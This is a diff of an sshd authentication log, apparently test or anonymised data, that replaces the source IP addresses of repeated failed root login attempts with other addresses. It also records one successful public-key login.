 Feb 22 16:56:18 slave22 sshd[2993]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:56:19 slave22 sshd[2993]: Failed password for root from 116.31.116.27 port 54178 ssh2
-Feb 22 16:56:21 slave22 sshd[2993]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:56:21 slave22 sshd[2993]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
-Feb 22 16:56:53 slave22 sshd[3005]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:56:19 slave22 sshd[2993]: Failed password for root from 216.160.83.58 port 54178 ssh2
+Feb 22 16:56:21 slave22 sshd[2993]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:56:21 slave22 sshd[2993]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
+Feb 22 16:56:53 slave22 sshd[3005]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:56:53 slave22 sshd[3005]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:56:55 slave22 sshd[3005]: Failed password for root from 202.109.143.106 port 2757 ssh2
+Feb 22 16:56:55 slave22 sshd[3005]: Failed password for root from 202.196.224.106 port 2757 ssh2
 Feb 22 16:56:55 slave22 sshd[3005]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:56:57 slave22 sshd[3005]: Failed password for root from 202.109.143.106 port 2757 ssh2
+Feb 22 16:56:57 slave22 sshd[3005]: Failed password for root from 202.196.224.106 port 2757 ssh2
 Feb 22 16:56:58 slave22 sshd[3005]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:00 slave22 sshd[3005]: Failed password for root from 202.109.143.106 port 2757 ssh2
+Feb 22 16:57:00 slave22 sshd[3005]: Failed password for root from 202.196.224.106 port 2757 ssh2
 Feb 22 16:57:01 slave22 sshd[3005]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:03 slave22 sshd[3005]: Failed password for root from 202.109.143.106 port 2757 ssh2
-Feb 22 16:57:05 slave22 sshd[3009]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:57:03 slave22 sshd[3005]: Failed password for root from 202.196.224.106 port 2757 ssh2
+Feb 22 16:57:05 slave22 sshd[3009]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:57:05 slave22 sshd[3009]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:57:06 slave22 sshd[3005]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:07 slave22 sshd[3009]: Failed password for root from 116.31.116.27 port 47019 ssh2
+Feb 22 16:57:07 slave22 sshd[3009]: Failed password for root from 216.160.83.58 port 47019 ssh2
 Feb 22 16:57:07 slave22 sshd[3009]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:08 slave22 sshd[3005]: Failed password for root from 202.109.143.106 port 2757 ssh2
+Feb 22 16:57:08 slave22 sshd[3005]: Failed password for root from 202.196.224.106 port 2757 ssh2
 Feb 22 16:57:09 slave22 sshd[3005]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:57:09 slave22 sshd[3005]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:57:09 slave22 sshd[3005]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:57:09 slave22 sshd[3005]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:57:10 slave22 sshd[3009]: Failed password for root from 116.31.116.27 port 47019 ssh2
+Feb 22 16:57:10 slave22 sshd[3009]: Failed password for root from 216.160.83.58 port 47019 ssh2
 Feb 22 16:57:10 slave22 sshd[3009]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:12 slave22 sshd[3009]: Failed password for root from 116.31.116.27 port 47019 ssh2
-Feb 22 16:57:12 slave22 sshd[3009]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:57:12 slave22 sshd[3009]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
-Feb 22 16:57:42 slave22 sshd[3013]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:57:12 slave22 sshd[3009]: Failed password for root from 216.160.83.58 port 47019 ssh2
+Feb 22 16:57:12 slave22 sshd[3009]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:57:12 slave22 sshd[3009]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
+Feb 22 16:57:42 slave22 sshd[3013]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:57:42 slave22 sshd[3013]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:44 slave22 sshd[3013]: Failed password for root from 202.109.143.106 port 4016 ssh2
+Feb 22 16:57:44 slave22 sshd[3013]: Failed password for root from 202.196.224.106 port 4016 ssh2
 Feb 22 16:57:45 slave22 sshd[3013]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:47 slave22 sshd[3013]: Failed password for root from 202.109.143.106 port 4016 ssh2
+Feb 22 16:57:47 slave22 sshd[3013]: Failed password for root from 202.196.224.106 port 4016 ssh2
 Feb 22 16:57:47 slave22 sshd[3013]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:49 slave22 sshd[3013]: Failed password for root from 202.109.143.106 port 4016 ssh2
+Feb 22 16:57:49 slave22 sshd[3013]: Failed password for root from 202.196.224.106 port 4016 ssh2
 Feb 22 16:57:50 slave22 sshd[3013]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:51 slave22 sshd[3013]: Failed password for root from 202.109.143.106 port 4016 ssh2
+Feb 22 16:57:51 slave22 sshd[3013]: Failed password for root from 202.196.224.106 port 4016 ssh2
 Feb 22 16:57:51 slave22 sshd[3013]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:57:53 slave22 sshd[3013]: Failed password for root from 202.109.143.106 port 4016 ssh2
+Feb 22 16:57:53 slave22 sshd[3013]: Failed password for root from 202.196.224.106 port 4016 ssh2
 Feb 22 16:57:53 slave22 sshd[3013]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:57:53 slave22 sshd[3013]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:57:53 slave22 sshd[3013]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:57:53 slave22 sshd[3013]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:58:01 slave22 sshd[3025]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:58:01 slave22 sshd[3025]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:58:01 slave22 sshd[3025]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:03 slave22 sshd[3025]: Failed password for root from 202.109.143.106 port 1650 ssh2
+Feb 22 16:58:03 slave22 sshd[3025]: Failed password for root from 202.196.224.106 port 1650 ssh2
 Feb 22 16:58:03 slave22 sshd[3025]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:58:03 slave22 sshd[3033]: Accepted publickey for drewr from 69.245.39.97 port 42136 ssh2: RSA 01:67:32:d9:b3:20:5d:2d:5f:b4:35:c5:a5:8b:0a:5e
 Feb 22 16:58:03 slave22 sshd[3033]: pam_unix(sshd:session): session opened for user drewr by (uid=0)
 Feb 22 16:58:04 slave22 sshd[3037]: Received disconnect from 69.245.39.97: 11: disconnected by user
 Feb 22 16:58:04 slave22 sshd[3033]: pam_unix(sshd:session): session closed for user drewr
-Feb 22 16:58:04 slave22 sshd[3029]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:58:04 slave22 sshd[3029]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:58:04 slave22 sshd[3029]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:06 slave22 sshd[3025]: Failed password for root from 202.109.143.106 port 1650 ssh2
+Feb 22 16:58:06 slave22 sshd[3025]: Failed password for root from 202.196.224.106 port 1650 ssh2
 Feb 22 16:58:06 slave22 sshd[3025]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:07 slave22 sshd[3029]: Failed password for root from 116.31.116.27 port 53314 ssh2
+Feb 22 16:58:07 slave22 sshd[3029]: Failed password for root from 216.160.83.58 port 53314 ssh2
 Feb 22 16:58:07 slave22 sshd[3029]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:08 slave22 sshd[3025]: Failed password for root from 202.109.143.106 port 1650 ssh2
+Feb 22 16:58:08 slave22 sshd[3025]: Failed password for root from 202.196.224.106 port 1650 ssh2
 Feb 22 16:58:08 slave22 sshd[3025]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:09 slave22 sshd[3029]: Failed password for root from 116.31.116.27 port 53314 ssh2
+Feb 22 16:58:09 slave22 sshd[3029]: Failed password for root from 216.160.83.58 port 53314 ssh2
 Feb 22 16:58:09 slave22 sshd[3029]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:10 slave22 sshd[3025]: Failed password for root from 202.109.143.106 port 1650 ssh2
+Feb 22 16:58:10 slave22 sshd[3025]: Failed password for root from 202.196.224.106 port 1650 ssh2
 Feb 22 16:58:11 slave22 sshd[3025]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:11 slave22 sshd[3029]: Failed password for root from 116.31.116.27 port 53314 ssh2
-Feb 22 16:58:12 slave22 sshd[3029]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:58:12 slave22 sshd[3029]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
-Feb 22 16:58:13 slave22 sshd[3025]: Failed password for root from 202.109.143.106 port 1650 ssh2
+Feb 22 16:58:11 slave22 sshd[3029]: Failed password for root from 216.160.83.58 port 53314 ssh2
+Feb 22 16:58:12 slave22 sshd[3029]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:58:12 slave22 sshd[3029]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
+Feb 22 16:58:13 slave22 sshd[3025]: Failed password for root from 202.196.224.106 port 1650 ssh2
 Feb 22 16:58:13 slave22 sshd[3025]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:58:13 slave22 sshd[3025]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:58:13 slave22 sshd[3025]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:58:13 slave22 sshd[3025]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:58:34 slave22 sshd[3044]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:58:34 slave22 sshd[3044]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:58:34 slave22 sshd[3044]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:37 slave22 sshd[3044]: Failed password for root from 202.109.143.106 port 3023 ssh2
+Feb 22 16:58:37 slave22 sshd[3044]: Failed password for root from 202.196.224.106 port 3023 ssh2
 Feb 22 16:58:38 slave22 sshd[3044]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:41 slave22 sshd[3044]: Failed password for root from 202.109.143.106 port 3023 ssh2
+Feb 22 16:58:41 slave22 sshd[3044]: Failed password for root from 202.196.224.106 port 3023 ssh2
 Feb 22 16:58:41 slave22 sshd[3044]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:43 slave22 sshd[3044]: Failed password for root from 202.109.143.106 port 3023 ssh2
+Feb 22 16:58:43 slave22 sshd[3044]: Failed password for root from 202.196.224.106 port 3023 ssh2
 Feb 22 16:58:43 slave22 sshd[3044]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:45 slave22 sshd[3044]: Failed password for root from 202.109.143.106 port 3023 ssh2
+Feb 22 16:58:45 slave22 sshd[3044]: Failed password for root from 202.196.224.106 port 3023 ssh2
 Feb 22 16:58:46 slave22 sshd[3044]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:48 slave22 sshd[3044]: Failed password for root from 202.109.143.106 port 3023 ssh2
+Feb 22 16:58:48 slave22 sshd[3044]: Failed password for root from 202.196.224.106 port 3023 ssh2
 Feb 22 16:58:48 slave22 sshd[3044]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:58:48 slave22 sshd[3044]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:58:48 slave22 sshd[3044]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:58:48 slave22 sshd[3044]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:58:52 slave22 sshd[3056]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:58:52 slave22 sshd[3056]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:58:52 slave22 sshd[3056]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:54 slave22 sshd[3056]: Failed password for root from 202.109.143.106 port 4898 ssh2
+Feb 22 16:58:54 slave22 sshd[3056]: Failed password for root from 202.196.224.106 port 4898 ssh2
 Feb 22 16:58:54 slave22 sshd[3056]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:56 slave22 sshd[3056]: Failed password for root from 202.109.143.106 port 4898 ssh2
+Feb 22 16:58:56 slave22 sshd[3056]: Failed password for root from 202.196.224.106 port 4898 ssh2
 Feb 22 16:58:57 slave22 sshd[3056]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:59 slave22 sshd[3060]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:58:59 slave22 sshd[3060]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:58:59 slave22 sshd[3060]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:58:59 slave22 sshd[3056]: Failed password for root from 202.109.143.106 port 4898 ssh2
+Feb 22 16:58:59 slave22 sshd[3056]: Failed password for root from 202.196.224.106 port 4898 ssh2
 Feb 22 16:58:59 slave22 sshd[3056]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:01 slave22 sshd[3060]: Failed password for root from 116.31.116.27 port 49903 ssh2
+Feb 22 16:59:01 slave22 sshd[3060]: Failed password for root from 216.160.83.58 port 49903 ssh2
 Feb 22 16:59:01 slave22 sshd[3060]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:01 slave22 sshd[3056]: Failed password for root from 202.109.143.106 port 4898 ssh2
+Feb 22 16:59:01 slave22 sshd[3056]: Failed password for root from 202.196.224.106 port 4898 ssh2
 Feb 22 16:59:02 slave22 sshd[3056]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:03 slave22 sshd[3060]: Failed password for root from 116.31.116.27 port 49903 ssh2
-Feb 22 16:59:03 slave22 sshd[3056]: Failed password for root from 202.109.143.106 port 4898 ssh2
+Feb 22 16:59:03 slave22 sshd[3060]: Failed password for root from 216.160.83.58 port 49903 ssh2
+Feb 22 16:59:03 slave22 sshd[3056]: Failed password for root from 202.196.224.106 port 4898 ssh2
 Feb 22 16:59:04 slave22 sshd[3056]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:59:04 slave22 sshd[3056]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:59:04 slave22 sshd[3056]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:59:04 slave22 sshd[3056]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 16:59:05 slave22 sshd[3060]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:07 slave22 sshd[3060]: Failed password for root from 116.31.116.27 port 49903 ssh2
-Feb 22 16:59:08 slave22 sshd[3060]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:59:08 slave22 sshd[3060]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:59:07 slave22 sshd[3060]: Failed password for root from 216.160.83.58 port 49903 ssh2
+Feb 22 16:59:08 slave22 sshd[3060]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:59:08 slave22 sshd[3060]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:59:15 slave22 sshd[3064]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root
 Feb 22 16:59:15 slave22 sshd[3064]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:59:17 slave22 sshd[3064]: Failed password for root from 223.99.60.46 port 43257 ssh2
 Feb 22 16:59:21 slave22 sshd[3064]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:21 slave22 sshd[3068]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:59:21 slave22 sshd[3068]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:59:21 slave22 sshd[3068]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:59:24 slave22 sshd[3064]: Failed password for root from 223.99.60.46 port 43257 ssh2
-Feb 22 16:59:24 slave22 sshd[3068]: Failed password for root from 202.109.143.106 port 3101 ssh2
+Feb 22 16:59:24 slave22 sshd[3068]: Failed password for root from 202.196.224.106 port 3101 ssh2
 Feb 22 16:59:24 slave22 sshd[3068]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:59:24 slave22 sshd[3064]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:26 slave22 sshd[3068]: Failed password for root from 202.109.143.106 port 3101 ssh2
+Feb 22 16:59:26 slave22 sshd[3068]: Failed password for root from 202.196.224.106 port 3101 ssh2
 Feb 22 16:59:27 slave22 sshd[3068]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:59:27 slave22 sshd[3064]: Failed password for root from 223.99.60.46 port 43257 ssh2
 Feb 22 16:59:27 slave22 sshd[3064]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:59:29 slave22 sshd[3068]: Failed password for root from 202.109.143.106 port 3101 ssh2
+Feb 22 16:59:29 slave22 sshd[3068]: Failed password for root from 202.196.224.106 port 3101 ssh2
 Feb 22 16:59:29 slave22 sshd[3068]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:59:30 slave22 sshd[3064]: Failed password for root from 223.99.60.46 port 43257 ssh2
 Feb 22
16:59:30 slave22 sshd[3064]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:59:31 slave22 sshd[3068]: Failed password for root from 202.109.143.106 port 3101 ssh2 +Feb 22 16:59:31 slave22 sshd[3068]: Failed password for root from 202.196.224.106 port 3101 ssh2 Feb 22 16:59:31 slave22 sshd[3068]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:32 slave22 sshd[3064]: Failed password for root from 223.99.60.46 port 43257 ssh2 -Feb 22 16:59:33 slave22 sshd[3068]: Failed password for root from 202.109.143.106 port 3101 ssh2 +Feb 22 16:59:33 slave22 sshd[3068]: Failed password for root from 202.196.224.106 port 3101 ssh2 Feb 22 16:59:33 slave22 sshd[3064]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:33 slave22 sshd[3068]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:59:33 slave22 sshd[3068]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:59:33 slave22 sshd[3068]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:59:33 slave22 sshd[3068]: PAM service(sshd) ignoring max retries; 5 > 3 Feb 22 16:59:35 slave22 sshd[3064]: Failed password for root from 223.99.60.46 port 43257 ssh2 Feb 22 16:59:35 slave22 sshd[3064]: Disconnecting: Too many authentication failures for root [preauth] 
@@ -589,67 +589,67 @@ Feb 22 16:59:43 slave22 sshd[3072]: pam_succeed_if(sshd:auth): requirement "uid Feb 22 16:59:45 slave22 sshd[3072]: Failed password for root from 223.99.60.46 port 4679 ssh2 Feb 22 16:59:46 slave22 sshd[3072]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:48 slave22 sshd[3072]: Failed password for root from 223.99.60.46 port 4679 ssh2 -Feb 22 16:59:54 slave22 sshd[3084]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 16:59:54 slave22 sshd[3084]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 16:59:54 slave22 sshd[3084]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:56 slave22 sshd[3072]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:59:56 slave22 sshd[3084]: Failed password for root from 116.31.116.27 port 43528 ssh2 +Feb 22 16:59:56 slave22 sshd[3084]: Failed password for root from 216.160.83.58 port 43528 ssh2 Feb 22 16:59:56 slave22 sshd[3084]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:59:56 slave22 sshd[3088]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:59:56 slave22 sshd[3088]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:59:56 slave22 sshd[3088]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:58 slave22 sshd[3072]: Failed password for root from 223.99.60.46 port 4679 ssh2 -Feb 22 16:59:58 slave22 sshd[3084]: Failed password for root from 116.31.116.27 port 43528 ssh2 -Feb 22 16:59:59 slave22 sshd[3088]: Failed password for root from 202.109.143.106 port 4450 ssh2 +Feb 22 16:59:58 slave22 sshd[3084]: Failed password for root from 
216.160.83.58 port 43528 ssh2 +Feb 22 16:59:59 slave22 sshd[3088]: Failed password for root from 202.196.224.106 port 4450 ssh2 Feb 22 16:59:59 slave22 sshd[3084]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:59 slave22 sshd[3072]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:59:59 slave22 sshd[3088]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:01 slave22 sshd[3084]: Failed password for root from 116.31.116.27 port 43528 ssh2 +Feb 22 17:00:01 slave22 sshd[3084]: Failed password for root from 216.160.83.58 port 43528 ssh2 Feb 22 17:00:01 slave22 sshd[3072]: Failed password for root from 223.99.60.46 port 4679 ssh2 Feb 22 17:00:01 slave22 sshd[3072]: Disconnecting: Too many authentication failures for root [preauth] Feb 22 17:00:01 slave22 sshd[3072]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:00:01 slave22 sshd[3072]: PAM service(sshd) ignoring max retries; 6 > 3 -Feb 22 17:00:01 slave22 sshd[3088]: Failed password for root from 202.109.143.106 port 4450 ssh2 -Feb 22 17:00:01 slave22 sshd[3084]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 17:00:01 slave22 sshd[3084]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 17:00:01 slave22 sshd[3088]: Failed password for root from 202.196.224.106 port 4450 ssh2 +Feb 22 17:00:01 slave22 sshd[3084]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 17:00:01 slave22 sshd[3084]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 17:00:01 slave22 sshd[3088]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:03 slave22 sshd[3088]: Failed password for root from 202.109.143.106 port 4450 ssh2 +Feb 22 17:00:03 slave22 sshd[3088]: Failed password for 
root from 202.196.224.106 port 4450 ssh2 Feb 22 17:00:04 slave22 sshd[3088]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:04 slave22 sshd[3099]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.99.60.46 user=root Feb 22 17:00:04 slave22 sshd[3099]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:06 slave22 sshd[3088]: Failed password for root from 202.109.143.106 port 4450 ssh2 +Feb 22 17:00:06 slave22 sshd[3088]: Failed password for root from 202.196.224.106 port 4450 ssh2 Feb 22 17:00:06 slave22 sshd[3099]: Failed password for root from 223.99.60.46 port 31185 ssh2 Feb 22 17:00:06 slave22 sshd[3088]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:07 slave22 sshd[3099]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 17:00:08 slave22 sshd[3088]: Failed password for root from 202.109.143.106 port 4450 ssh2 +Feb 22 17:00:08 slave22 sshd[3088]: Failed password for root from 202.196.224.106 port 4450 ssh2 Feb 22 17:00:08 slave22 sshd[3088]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 17:00:08 slave22 sshd[3088]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 17:00:08 slave22 sshd[3088]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 17:00:08 slave22 sshd[3088]: PAM service(sshd) ignoring max retries; 5 > 3 Feb 22 17:00:09 slave22 sshd[3099]: Failed password for root from 223.99.60.46 port 31185 ssh2 Feb 22 17:00:10 slave22 sshd[3099]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 17:00:13 slave22 sshd[3099]: Failed password for root from 223.99.60.46 port 31185 ssh2 Feb 22 17:00:14 slave22 sshd[3099]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user 
